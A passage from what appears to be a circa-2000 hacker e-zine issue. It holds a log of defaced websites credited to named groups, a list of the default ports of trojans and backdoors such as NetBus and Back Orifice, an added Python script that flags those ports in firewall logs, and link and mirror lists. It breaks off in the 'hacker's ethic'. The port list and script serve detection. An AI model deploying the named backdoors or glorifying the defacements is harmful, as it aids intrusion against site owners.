      [00.02.18] NT [Cyber Fuckers]        Italian National Institute of Health (www.iss.it)
      [00.02.18] Lr [naptime and rich]     ISP.Com (www.isp.com)
      [00.02.18] Lr [Crime Boys]       M   Ricardo Dreves' Web site (www.dreves.com.br)
      [00.02.18] Bf [LLT]                  AudioSeek (www.audioseek.com)
      [00.02.18] Li [ ]                    JoyClick TWIS (twis.joyclick.net)
      [00.02.18] Li [ ]                 C  Seoul National University Seorak Server (seorak.snu.ac.kr)
      [00.02.18] Li [ ]                    ThruNet IP Server (s210-219-190-139.thrunet.ne.kr)
      [00.02.18] Lr [ ]                    ThruNet (s210-219-159-31.thrunet.ne.kr)
      [00.02.18] Li [ ]                 C  Seoul National University (maum.snu.ac.kr)
      [00.02.18] Lr [ ]                    Booktopia Mail Server (mail.booktopia.com)
      [00.02.17] NT [ ]                    Methuen Public Schools (www.methuen.k12.ma.us)
      [00.02.17] So [complex]              JOIN Systems (www.join.com)
      [00.02.17] So [Team Echo]        M   Best Buy Computer Shop (bestbuyshop.com.br)
      [00.02.17] NT [Artech]               USD 261 Haysville Schools (www.usd261.com)
      [00.02.17] NT [BlazinWeed]           Surface Mount Conference and Exhibition (www.surfacemount.com)
      [00.02.17] NT [OA]                   Steinberg Cellars (www.steinbergcellars.co.nz)
      [00.02.17] NT [ ]                    Paul Bunyan Days (www.paulbunyandays.com)
      [00.02.16] NT [BlazinWeed]           California State Assembly (www.assembly.ca.gov)
      [00.02.16] Bf [Cyrus the Virus]      UCH 2K (www.uch2k.org)
      [00.02.16] So [TREATY]               Power IR (www.powerir.com)
      [00.02.16] NT [Team Echo]            HUD Housing Counseling Clearinghouse (www.hudhcc.org)
      [00.02.16] NT [KabraLzZ]             Ciudad de Portiva (www.ciudaddeportiva.org)
      [00.02.16] NT [BlazinWeed]           UK Charity Commission (www.charity-commission.gov.uk)
      [00.02.16] Bf [Cuzz]                 Barkley Anderson's Web site (www.barkley.org)
      [00.02.16] NT [BlazinWeed]           Data Systems Integrators, Inc. (websvr.ewol.com)
      [00.02.16] So [BlackMan]             Kumoh National University of Technology (knut.kumoh.ac.kr)
      [00.02.16] NT [BlazinWeed]           NetManage eSolutions (esolutions.netmanage.com)
      [00.02.15] So [Team Echo]            ShadowScape Technologies (www.shadowscape.com)
      [00.02.15] NT [deface]               Rollinsford Grade School (www.rollinsford.k12.nh.us)
      [00.02.15] NT [BlazinWeed]           DeLaSalle Education Center (www.delasallecenter.org)
      [00.02.15] NT [c0rvus]               Axis Sinimbu Logistica Automotiva Ltda (www.asl.com.br)
      [00.02.15] NT [Artech]               Dept of Transportation Office of the CIO (cio.ost.dot.gov)
      [00.02.15] NT [Artech]               DOT Transportation Administrative Services Center (isweb.tasc.dot.gov)
      [00.02.15] NT [Artech]               Innov8 At Work, Office of the Secretary of Transportation (innov8atwork.ost.dot.gov)
      [00.02.15] NT [Artech]               Dept. of Transportation Y2K Web site (y2ktransport.ost.dot.gov)
      [00.02.15] Li [TheP|nkPanthe|2]      Buy 4 Fun (www.buy4fun.com)
      [00.02.15] Li [metacom]              Hex Hackers (www.hexhackers.com)
      [00.02.14] NT [Cyber Fuckers]     C  Pedo Watch (www.pedowatch.org)
      [00.02.14] NT [Team Escape]      M   TM Guide (www.tmguide.com)
      [00.02.14] So [Team Echo]            Timber Jay (www.timberjay.com)
      [00.02.14] Bf [Sabu]                 G-X (www.g-x.net)
      [00.02.14] Li [dj kensu]             ejeet.org (www.ejeet.org)
      [00.02.14] NT [Scrippie]         M   Stichting Isolatie Nederlandse Industrie (www.cini.org.uk)
      [00.02.14] NT [alt3kx]               UVC Argentina (www.uvc.com.ar)
      [00.02.13] NT [Cyber Fuckers]        Gobierno del Estado de Chiapas (www.chiapas.gob.mx)
      [00.02.13] NT [Team Echo]            Cuban Instituto de Meteorología (www.met.inf.cu)
      [00.02.13] NT [Team Echo]            H. Lavity Stoutt Community College, British Virgin Islands (www.hlscc.edu.vg)
      [00.02.13] NT [Cyber Fuckers]        United Nations Education, Scientific, and Cultural Organization (www.unesco.org.br)
      [00.02.13] NT [Team Echo]        M   CompuNet Israel (www.compunet.co.il)
      [00.02.13] NT [Team Echo]            Trak (www.trak.co.il)
      [00.02.13] NT [Team Echo]            Take Toro (www.take-toro.co.il)
      [00.02.13] NT [Team Echo]            Tagro (www.tagro.co.il)
      [00.02.13] NT [Team Echo]            Super Mass (www.supermass.co.il)
      [00.02.13] NT [Team Echo]            Promo (www.promo.co.il)
      [00.02.13] NT [Team Echo]            MidiCom (www.midicom.co.il)
      [00.02.13] NT [Team Echo]            MegaByte (www.mega-byte.co.il)
      [00.02.13] NT [Team Echo]            Dotan (www.m-dotan.co.il)
      [00.02.13] NT [Team Echo]            Hagay Motorcycles (www.hagay-motorcycles.co.il)
      [00.02.13] NT [Team Echo]            Guiding Service (www.guidingservice.co.il)
      [00.02.13] NT [Team Echo]            Bet N Chat (www.betnchat.co.il)
      [00.02.13] So [Dor]                  SiliconNet Technologies Sdn.Bhd. (www.snt.com.my)
      [00.02.13] Bf [Tek]                  PMT Africa (www.pmtafrica.co.za)
      [00.02.13] Li [kingstr0ke]           Planet HQ (www.planethq.com)
      [00.02.13] NT [Team Echo]            Manchester Area Chamber of Commerce (www.manchester-tn.com)
      [00.02.13] NT [Crime Boys]           LG Electronics Software Development Center (www.lgsi.co.in)
      [00.02.13] So [kryptek]              E-Classified, Inc. (www.e-class.com)
      [00.02.13] Li [-X-]                  Cr4sh.Net (www.cr4sh.net)
      [00.02.13] Bf [Sabu]                 Artzy (www.artzy.com)
      [00.02.13] Li [kingstr0ke]           Warez Your PC (warezyourpc.com)
      [00.02.13] NT [RAT]                  HSR Hochschule Rapperswil (cn-pc30.hsr.ch)
      [00.02.12] Lr [Coolio]               RSA Security Inc. (www.rsa.com)
      [00.02.12] NT [Cyber Fuckers]        Reuters Sweden (www.reuters.se)
      [00.02.12] So [Cyber Fuckers]        Secretaria de Relaciones Exteriores (www.sre.gob.mx)
      [00.02.12] NT [Crime Boys]           Teleplus Tecnologia Eletro Eletronica Ltda (www.teleplus.com.br)
      [00.02.12] NT [ ]                    Lammy Industrial Madeireira da Amazonia Ltda (www.lammy.com.br)
      [00.02.12] NT [Team Echo]            Independent Insurance Agents of America (www.iiaa.org)
      [00.02.12] NT [Crime Boys]           FOB Asset Management E Corretora De Seguros (www.fob.com.br)
      [00.02.12] NT [Carte Blanche]        E2 Consultants (www.e2.com)
      [00.02.12] BI [d0ze]                 CRC Enterprises (www.crcamp.com)
      [00.02.12] Lr [lazy hackers]         Prevent Child Abuse Kentucky (pcak.net)
      [00.02.11] NT [DHC]                  WABN 92.7 (www.wabn.com)
      [00.02.11] NT [DHC]                  Vol Business (www.vol-business.net)
      [00.02.11] NT [RAT]              M   Utah Access (www.utahaccess.com)
      [00.02.11] NT [Team Echo]            Boy Scout Troop 35, Highland Park, Texas (www.troop35.org)
      [00.02.11] NT [ ]                    Boy Scout Troop 10, Honeoye Falls, NY (www.troop10.org)
      [00.02.11] Bo [ ]                    Triology (www.triology.net)
      [00.02.11] NT [pimp]                 Business Consulting Solutions, Inc. (www.tips.com)
      [00.02.11] NT [Team Echo]            Stichting Seniorweb (www.seniorweb.nl)
      [00.02.11] NT [DHC]                  Quantum Dentistry (www.quantumdentistry.com)
      [00.02.11] NT [i s]                  National Registered Agents, Inc (www.nrai.com)
      [00.02.11] NT [DHC]                  National Business College (www.nationalbusiness.edu)
      [00.02.11] NT [DHC]                  Mountain Sports Ltd. (www.mountainsportsltd.com)
      [00.02.11] So [kryptek]              Interlinea 2000 (www.i2000.es)
      [00.02.11] NT [Saint]                Hatfield Christian Church (www.hatfield.co.za)
      [00.02.11] NT [DHC]                  Gene Cochran's site (www.genecochran.com)
      [00.02.11] NT [DHC]                  FSB Dongola (www.fsbdongola.com)
      [00.02.11] Li [DLX]               C  Entertain Eon (www.entertaineon.com)
      [00.02.11] NT [KabraLzZ]             Labin4 Laboratorio de Informatica (www.encontrefacil.com.br)
      [00.02.11] Bf [Sabu]                 Cover Connection (www.coverconnection.com)
      [00.02.11] NT [DHC]                  Barker Realty (www.barker-realty.com)
      [00.02.11] NT [DHC]                  Applied Logical Methods (www.aplomet.com)
      [00.02.11] Lr [X-Gh0sT]              Medianet s.r.l (netserv.mnet.it)
      [00.02.11] NT [DHC]                  Education Systems Corporation (fugazzi.educorp.edu)
      [00.02.11] Lr [Ph0bic]               PortoNet (www.portonet.pt)
      [00.02.10] NT [Mr_Min]               NASA GSFC Office of Human Resources (ohr.gsfc.nasa.gov)
      [00.02.10] Lr [ook-ook]              Who is Your Daddy (www.whoisyourdaddy.net)
      [00.02.10] NT [Team Echo]            Troop 62 (www.troop.org)
      [00.02.10] So [kidblount]            Sargon Consulting (www.gosargon.com)
      [00.02.10] Li [Death Knights]        Fundação Mineira de Educação e Cultura (www.fumec.br)
      [00.02.10] NT [Artech]               Allard Group (www.clairant.com)
      [00.02.09] So [Team Echo]            Tennessee Crime Law (www.tncrimlaw.com)
      [00.02.09] Li [Team Infinity]        l33to.com (www.l33to.com)
      [00.02.09] NT [Team Echo]            Asociación Mundial de Radios Comunitarias (www.amarc.org)
      [00.02.09] So [Team Echo]            Newmill Trout & Deer Farm (newmilltrout.com)
      [00.02.09] NT [Mindmelt]             LA.com (ip-250.la.com)
      [00.02.09] NT [ZeroForce]            National Association of State Universities and Land-Grant Colleges (www.nasulgc.org)
      [00.02.09] Bf [sabu]             M   Unix CCTV (www.unixcctv.com)
      [00.02.08] Lr [Trent]                JP Miniskirt (www.miniskirt-jp.com)
      [00.02.08] So [Team Echo]            First Music (www.firstmusic.com)
      [00.02.07] NT [Grupo and Ka0s]       Universidad Quetzalcoatl de Irapuato (www.uqi.edu.mx)
      [00.02.07] NT [ ]                 C  Texas Mint (www.texasmint.com)
      [00.02.07] BI [KabraLzZ]             Ciudad de Santa Fe (www.santafeciudad.gov.ar)
      [00.02.07] NT [Artech]               Rupee Saver (www.rupeesaver.com)
      [00.02.07] Lr [Check0ut]             Mali Embassy in the US (www.maliembassy-usa.org)
      [00.02.07] NT [Verb0]                Panel Components Corporation (www.interpower.com)
      [00.02.07] NT [Crime Boys]           Carvalho e Fernandes Ltda (www.comercialcarvalho.com.br)
      [00.02.07] So [ ]                    Council of Conservative Citizens (www.cofcc.org)
      [00.02.07] NT [Artech]               Clairant (www.clairant.com)
      [00.02.07] NT [Artech]               Be Wear 0303 (www.bewear0303.com)
      [00.02.07] NT [AloneX]               La Banda Del Recodo (www.bandaelrecodo.com.mx)
      [00.02.07] Li [Death Knights]        Agencia Brasileira de Noticias (www.abn.com.br)
      [00.02.06] So [LA|Calif]             X Streams (www.xstreams.com)
      [00.02.06] So [LA|Calif]             Wet Jeans (www.wetjeans.com)
      [00.02.06] NT [dot-slash crew]       PKS Porzellanklinik System GmbH (www.porzellanklinik.de)
      [00.02.06] NT [c0rvus]               Planeta Latino (www.planetalatino.com)
      [00.02.06] NT [KabraLzZ]             Fundação Instituto Brasileiro e Geografia e Estatística (www.lep.ibge.gov.br)
      [00.02.06] Lr [BlacKc0De]            University of Chile Hospital (www.hospital.uchile.cl)
      [00.02.06] NT [KabraLzZ]             Escola Agrotecnica Federal de Bambui (www.eafbambui.gov.br)
      [00.02.06] NT [Protokol]             Dupe It (www.dupeit.com)
      [00.02.06] So [kryptek]              Kyung Sung University (voronoi.kyungsung.ac.kr)
      [00.02.06] NT [suave]                Houston Advanced Research Center (koala.harc.edu)
      [00.02.06] NT [Illusions Team]  A    Mail server for the Belgium Senate (xmail.senate.be)
      [00.02.06] NT [suave]                Palm Beach County, Florida  ISS Firewall (issfire1.co.palm-beach.fl.us)
      [00.02.05] NT [Illusions Team]       Economische Hogeschool Sint-Aloysius (www.ehsal.be)
      [00.02.05] NT [Protokol]             Lawrence Research Group (www.xandria.com)
      [00.02.05] Li [ ]                    WOH Crew (www.wohcrew.com)
      [00.02.05] Bf [DHC]                  SLTD Digital Design (www.sltd.com)
      [00.02.05] Ir [Illusions Team]       Southern California Regional Occupational Center (www.scroc.com)
      [00.02.05] Li [Trent]                Nirver Radio (www.nirveradio.com)
      [00.02.05] Bf [(/)/-_]          Air & Waste Management Association (www.environmentalshop.com)
      [00.02.05] Bf [DHC]                  eKitchen News (www.ekitchennews.com)
      [00.02.05] So [ ]                    Altavista Careers (careers.altavista.com)
      [00.02.05] Li [mOs]                  Sony Entertainment Television India (www.setindia.com)
      [00.02.05] Lr [Illusions Team]  A    One True Dave (www.otd.com)
      [00.02.05] NT [ ]                    DTR Software (www.dtr-software.com)
      [00.02.05] NT [#Dorknet]             Crime Watch S.A. (www.crimewatch.co.za)
      [00.02.05] NT [ ]                    BYU Bioag Computing (venom.byu.edu)
      [00.02.05] So [kryptek]           C  Kyung Sung University (dolphin.kyungsung.ac.kr)
      [00.02.04] NT [Wild Karrde]          Westcon Inc. (www.westcon.com)
      [00.02.04] Li [NeoTek]               Tyranny.org (www.tyranny.org)
      [00.02.04] NT [Illusions Team]  A    Metris N.V. (www.metris.be)
      [00.02.04] NT [tws]                  Faith Center (www.cfaith.org)
      [00.02.04]    [Cyb3r Fuck3rs]        Instituto Nacional de Metrologia, Normalizacao e Qualidade Industrial (www.inmetro.gov.br)
      [00.02.04] Li [InSt|nCt]             SGlyne (www.sglyne.com)
      [00.02.04] NT [snow]                 Enoch (www.enoch.com)
      [00.02.04] Lr [Dor]                  Dream Shell (www.dreamshell.com)
      [00.02.04] NT [snow]                 Chord Board (www.chordboard.com)
      [00.02.03] NT [confusion]            Yolo County (www.yolocounty.org)
      [00.02.03] NT [confusion]            La Salle College High School (www.lschs.wyndmoor.pa.us)
      [00.02.03] Li [ph33r the b33r]       LG Enterprises (www.lgenterprises.threadnet.com)
      [00.02.03] NT [akt0r]                ImagiNet S.A. (www.imaginet.co.za)
      [00.02.03] NT [Crime Boys]           Communications Projects and Computing (www.compcom.com.au)
      [00.02.03] NT [Team Echo]            Crawford Communications, Inc (www.centralindiana.com)
      [00.02.03] NT [confusion]            Ocean County, New Jersey (webhost.co.ocean.nj.us)
      [00.02.03] NT [confusion]            Culver City, California Name Server (ns1.culver-city.ca.us)
      [00.02.03] NT [confusion]            North Carolina, Moore County Web site (mccs.co.moore.nc.us)
      [00.02.02] NT [VSO Inc.]             Companhia De Informatica Do Parana - Celepar (www.tcefl.pr.gov.br)
      [00.02.02] NT [Tr1pl3 S31S]          Roderick & Martin, Professional Auctioneers (www.rodmar.co.za)
      [00.02.02] Li [SoiraM]               Partizan Football Club, Belgrade (www.partizan.co.yu)
      [00.02.02] NT [protokol]             Madera County School District (www.maderacoe.k12.ca.us)
      [00.02.02] NT [KabraLzZ]             Colombia Departamento Nacional de Planificación (www.dnp.gov.co)
      [00.02.02] Lr [ner0tec]              Keene State College CS Department (www.csdept.keene.edu)
      [00.02.02] NT [The Killer]           Corporación Autónoma Regional de Cundinamarca (www.car.gov.co)
      [00.02.02] NT [ViPER]                Azlan (www.azlan.nl)
      [00.02.01] Lr [synk]                 Kyung Sung Sea&Air Co., Ltd. (kssna.com)
      [00.02.01] 31 [ ]                    Dark Harbingers (www.darkharbingers.com)
      [00.02.01] Li [p4r4g0n3]             Fantex (www.fantex.com)
      [00.02.01] NT [Crime Boys]           JVC Info (www.jvcinfo.com)
      [00.02.01] NT [The Killer]           Romanian Ministry of Research and Technology (www.mct.ro)
      [00.02.01] NT [TWS]                  South Christian High School (www.schs.org)
      [00.02.01] So [fsk]               C  Japanese Institute of Space and Astronautical Science, VLBI Space Observatory Programme (www.vsop.isas.ac.jp)

      
       
 
        and more sites at the attrition cracked web sites mirror:

                     http://www.attrition.org/mirror/attrition/index.html 
 
       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________
       
      By: joakim.von.braun@risab.se 
      Source: PSS
       
      Common Trojan ports to watch for:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      After seeing several questions about traffic directed at ports such as
      31337 and 12345 I've put together a list of all trojans known to me and
      the default ports they are using. Of course several of them could use any
      port, but I hope this list will maybe give you a clue of what might be
      going on.
      
      port       21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx,
                          WinCrash
      port       23 - Tiny Telnet Server
      port       25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz
                          Stealth, Terminator, WinPC, WinSpy
      port       31 - Hackers Paradise
      port       80 - Executor
      port     456 - Hackers Paradise
      port     555 - Ini-Killer, Phase Zero, Stealth Spy
      port     666 - Satanz Backdoor
      port   1001 - Silencer, WebEx
      port   1011 - Doly Trojan
      port   1170 - Psyber Stream Server, Voice
      port   1234 - Ultors Trojan
      port   1245 - VooDoo Doll
      port   1492 - FTP99CMP
      port   1600 - Shivka-Burka
      port   1807 - SpySender
      port   1981 - Shockrave
      port   1999 - BackDoor
      port   2001 - Trojan Cow
      port   2023 - Ripper
      port   2115 - Bugs
      port   2140 - Deep Throat, The Invasor
      port   2801 - Phineas Phucker
      port   3024 - WinCrash
      port   3129 - Masters Paradise
      port   3150 - Deep Throat, The Invasor
      port   3700 - Portal of Doom
      port   4092 - WinCrash
      port   4590 - ICQTrojan
      port   5000 - Sockets de Troie
      port   5001 - Sockets de Troie
      port   5321 - Firehotcker
      port   5400 - Blade Runner
      port   5401 - Blade Runner
      port   5402 - Blade Runner
      port   5569 - Robo-Hack
      port   5742 - WinCrash
      port   6670 - DeepThroat
      port   6771 - DeepThroat
      port   6969 - GateCrasher, Priority
      port   7000 - Remote Grab
      port   7300 - NetMonitor
      port   7301 - NetMonitor
      port   7306 - NetMonitor
      port   7307 - NetMonitor
      port   7308 - NetMonitor
      port   7789 - ICKiller
      port   9872 - Portal of Doom
      port   9873 - Portal of Doom
      port   9874 - Portal of Doom
      port   9875 - Portal of Doom
      port   9989 - iNi-Killer
      port 10067 - Portal of Doom
      port 10167 - Portal of Doom
      port 11000 - Senna Spy
      port 11223 - Progenic trojan
      port 12223 - Hack99 KeyLogger
      port 12345 - GabanBus, NetBus
      port 12346 - GabanBus, NetBus
      port 12361 - Whack-a-mole
      port 12362 - Whack-a-mole
      port 16969 - Priority
      port 20001 - Millennium
      port 20034 - NetBus 2 Pro
      port 21544 - GirlFriend
      port 22222 - Prosiak
      port 23456 - Evil FTP, Ugly FTP
      port 26274 - Delta
      port 31337 - Back Orifice
      port 31338 - Back Orifice, DeepBO
      port 31339 - NetSpy DK
      port 31666 - BOWhack
      port 33333 - Prosiak
      port 34324 - BigGluck, TN
      port 40412 - The Spy
      port 40421 - Masters Paradise
      port 40422 - Masters Paradise
      port 40423 - Masters Paradise
      port 40426 - Masters Paradise
      port 47262 - Delta
      port 50505 - Sockets de Troie
      port 50766 - Fore
      port 53001 - Remote Windows Shutdown
      port 61466 - Telecommando
      port 65000 - Devil
      
      You'll find the list on the following address:
      http://www.simovits.com/nyheter9902.html  (still in Swedish but it will be
      translated in the near future).
      
      To help anyone to detect trojan attacks, I'm planning to add information
      about the original names of the executables, their size, where they usually
      are hiding, and the names of any helpfiles they may use. I will also add
      tools or links to tools that may be of your assistance.
      
      Feel free to get back to me with any comments or suggestions. If you find
      new trojans I'll love to get my hands on them, but please mail me first, as
      I don't need more than one copy. If you have live experience of trojan
      attacks I'm interested to read about your findings.
      
      Joakim
      
      joakim.von.braun@risab.se
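
      One way to put the list above to work on firewall logs, as an added
      example that is not part of Joakim's post: the log format, the sample
      lines, the function name and the sweep threshold are all assumptions made
      here, and only a few ports are copied from the list. A miss clears nothing,
      since the list covers default ports only.

```python
import re
from collections import defaultdict

# A few entries copied from the list above: default port -> trojan names.
TROJAN_DEFAULT_PORTS = {
    21: ["Blade Runner", "Doly Trojan", "Fore", "Invisible FTP", "WebEx", "WinCrash"],
    23: ["Tiny Telnet Server"],
    80: ["Executor"],
    12345: ["GabanBus", "NetBus"],
    12346: ["GabanBus", "NetBus"],
    20034: ["NetBus 2 Pro"],
    31337: ["Back Orifice"],
    31338: ["Back Orifice", "DeepBO"],
}

# Listed ports that are also the standard FTP, telnet, SMTP and HTTP ports.
# Traffic to them is usually legitimate, so a match on its own proves nothing.
SHARED_SERVICE_PORTS = {21, 23, 25, 80}

# Constructed log format (an assumption of this example, not a real product's):
#   <time> <ALLOW|DENY> <proto> <src>:<sport> -> <dst>:<dport>
LINE_RE = re.compile(
    r"^(?P<time>\S+) (?P<action>ALLOW|DENY) (?P<proto>\w+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample input; addresses are from the documentation ranges.
SAMPLE_LOG = """\
2000-02-20T10:00:01 DENY udp 203.0.113.5:1045 -> 192.0.2.10:31337
2000-02-20T10:00:01 DENY udp 203.0.113.5:1045 -> 192.0.2.11:31337
2000-02-20T10:00:02 DENY udp 203.0.113.5:1045 -> 192.0.2.12:31337
2000-02-20T10:01:30 DENY tcp 203.0.113.5:1050 -> 192.0.2.10:20034
2000-02-20T10:05:10 ALLOW tcp 198.51.100.7:2210 -> 192.0.2.20:12345
2000-02-20T10:06:00 ALLOW tcp 198.51.100.9:3301 -> 192.0.2.30:80
2000-02-20T10:07:00 ALLOW tcp 198.51.100.9:3302 -> 192.0.2.30:443
this line is not in the expected format
"""


def triage(log_text, sweep_threshold=3):
    """Group hits on listed ports by (source, port) and give each a verdict."""
    seen = defaultdict(lambda: {"dsts": set(), "allowed": False})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m is None:
            continue  # not a log record in the assumed format
        dport = int(m["dport"])
        if dport not in TROJAN_DEFAULT_PORTS:
            continue
        entry = seen[(m["src"], dport)]
        entry["dsts"].add(m["dst"])
        entry["allowed"] |= m["action"] == "ALLOW"

    findings = []
    for (src, dport), entry in sorted(seen.items()):
        if dport in SHARED_SERVICE_PORTS:
            # Could be the trojan, far more likely the ordinary service.
            verdict = "shared-service-port"
        elif entry["allowed"]:
            # The connection got through: check the destination host itself.
            verdict = "accepted-connection"
        elif len(entry["dsts"]) >= sweep_threshold:
            # One source trying the same port on many hosts: a scan for
            # already-infected machines, stopped at the filter.
            verdict = "blocked-sweep"
        else:
            verdict = "blocked-probe"
        findings.append({
            "src": src,
            "port": dport,
            "names": TROJAN_DEFAULT_PORTS[dport],
            "targets": len(entry["dsts"]),
            "verdict": verdict,
        })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f'{f["src"]:<14} port {f["port"]:<6} {f["verdict"]:<20} '
              f'targets={f["targets"]} ({", ".join(f["names"])})')
```

      Accepted connections to a listed, non-service port are the ones worth
      following up on the destination host first; blocked sweeps mostly tell
      you who is scanning.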


  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       The links are no longer maintained in this file, there is now a
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      
      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      
      HWA.hax0r.news Mirror Sites around the world:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW **
      http://datatwirl.intranova.net  ** NEW **
      http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
      http://net-security.org/hwahaxornews ** NEW **
      http://www.sysbreakers.com/hwa ** NEW **
      http://www.attrition.org/hosted/hwa/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://www.hackunlimited.com/zine/hwa/ *UPDATED*
      http://www.ducktank.net/hwa/issues.html ** NEW **
      http://www.alldas.de/hwaidx1.htm ** NEW **
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa *DOWN*
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://archives.projectgamma.com/zines/hwa/
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm
      http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
      http://hwa.hax0r.news.8m.com/           
      http://www.fortunecity.com/skyscraper/feature/103/  
      

      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondents and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      
          
      Belgium.......: http://securax.org/cum/ *New address*
      Brasil........: http://www.psynet.net/ka0z
                      http://www.elementais.cjb.net
      Canada........: http://www.hackcanada.com
      Croatia.......: http://security.monitor.hr
      Colombia......: http://www.cascabel.8m.com
                      http://www.intrusos.cjb.net
      Finland.......: http://hackunlimited.com/
      Germany.......: http://www.alldas.de/
                      http://www.security-news.com/
      Indonesia.....: http://www.k-elektronik.org/index2.html
                      http://members.xoom.com/neblonica/
                      http://hackerlink.or.id/
      Netherlands...: http://security.pine.nl/
      Russia........: http://www.tsu.ru/~eugene/
      Singapore.....: http://www.icepoint.com
      South Africa..: http://www.hackers.co.za
                      http://www.hack.co.za ** BACK ONLINE AS OF FEB 22ND **
                      http://www.posthuman.za.net
      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                                               and best security related e-zine.
      
                      
                       
                      
                      
                      
    .za (South Africa) sites contributed by wyzwun tnx guy...                  
      
      


    Got a link for this section? email it to cruciphux@dok.org and i'll
    review it and post it here if it merits it.
   
    
      
    @HWA
    
A.2 Hot Hits
    ~~~~~~~~    
    
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
    
    
       Today the spotlight may be on you, some interesting machines that
                  have accessed these archives recently...
               
                               _   _       _
                              | | | | ___ | |_
                              | |_| |/ _ \| __|
                              |  _  | (_) | |_
                              |_| |_|\___/ \__|
                               _    _ _ _
                              | |  | (_) |
                              | |__| |_| |_ ___
                              |  __  | | __/ __|
                              | |  | | | |_\__ \
                              |_|  |_|_|\__|___/
                              
                            .gov and .mil activity
                            
                             Updated Feb 2000
                             
                             
                             
    There are some interesting machines among these, the *.nosc.mil boxes are
    from SPAWAR information warfare centres, good Is It Worth It Followup to see
    our boys keeping up with the news... - Ed                             
  
    @HWA


A.3 Mirror Sites List
    ~~~~~~~~~~~~~~~~~
    
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
                       __  __ _
                      |  \/  (_)_ __ _ __ ___  _ __ ___
                      | |\/| | | '__| '__/ _ \| '__/ __|
                      | |  | | | |  | | | (_) | |  \__ \
                      |_|  |_|_|_|  |_|  \___/|_|  |___/
                      
                      
                      
   Some of these are not keeping up with new issues like they should be, you
   can always get the latest issue from www.csoft.net/~hwa or join us on IRC
   (EFnet) in channel #hwa.hax0r.news and check the topic or ask Cruciphux
   where the latest issues may be attained. I also upload all issues to 
   etext.org, the zines are available thru their ftp service, updates are slow.
   - Ed                 

                       


     New mirror sites
               
  ***   http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp   *** NEW *** 
  ***   http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***      
        http://datatwirl.intranova.net * NEW * 
        http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
        http://net-security.org/hwahaxornews     
        http://www.attrition.org/hosted/hwa/
        http://hwazine.cjb.net/   
        http://www.hackunlimited.com/files/secu/papers/hwa/
        http://www.attrition.org/~modify/texts/zines/HWA/                                
      * http://hwa.hax0r.news.8m.com/           
      * http://www.fortunecity.com/skyscraper/feature/103/  
               
      * Crappy free sites of no use to anyone. too lazy to kill em.      
     
                
    *** Most likely to be up to date other than the main site.    
                        
                        
     
     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     thanks to airportman for the Cubesoft bandwidth. Also shouts out to all 
     our mirror sites! and p0lix for the (now expired) digitalgeeks archive
     tnx guys. 
     
     http://www.csoft.net/~hwa
     
     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
     http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
     http://www.attrition.org/hosted/hwa/
     http://www.attrition.org/~modify/texts/zines/HWA/     
     http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
     http://www.csoft.net/~hwa/           
     http://welcome.to/HWA.hax0r.news/ 
     http://www.projectgamma.com/archives/zines/hwa/
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm
     
     
     @HWA
     
     
  
A.4  The hacker's Ethic (90's Style)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
     
     
          _   _            _             _    _____ _   _     _
         | | | | __ _  ___| | _____ _ __( )__| ____| |_| |__ (_) ___
         | |_| |/ _` |/ __| |/ / _ \ '__|/ __|  _| | __| '_ \| |/ __|
         |  _  | (_| | (__|   <  __/ |   \__ \ |___| |_| | | | | (__
         |_| |_|\__,_|\___|_|\_\___|_|   |___/_____|\__|_| |_|_|\___|



     Sadly, due to the traditional ignorance and sensationalizing of the mass
     media, the once-noble term hacker has become a pejorative.
     
     Among true computer people, being called a hacker is a compliment. One of
     the traits of the true hacker is a profoundly antibureaucratic and
     democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
     
     This ethic was best formulated by Steven Levy in his 1984 book Hackers:
     Heroes of the Computer Revolution. Its tenets are as follows:

      1 - Access to computers should be unlimited and total. 
      2 - All information should be free. 
      3 - Mistrust authority - promote decentralization. 
